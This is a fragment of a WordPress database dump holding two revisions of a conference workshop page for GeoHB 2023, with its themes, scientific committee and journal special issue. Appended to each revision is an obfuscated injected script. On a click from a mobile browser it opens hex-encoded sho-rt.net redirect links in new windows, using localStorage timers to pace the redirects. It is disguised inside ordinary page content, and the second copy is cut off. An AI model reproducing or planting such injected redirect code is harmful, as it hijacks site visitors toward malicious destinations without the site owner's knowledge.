behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n</ul>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2022-10-14 17:15:37','2022-10-14 17:15:37','',2791,'https://gsw2023.com/?p=2832',0,'revision','',0),
(2833,1,'2022-10-14 17:16:15','2022-10-14 17:16:15','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4>Secretary</h4>\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"52\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n</ul>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 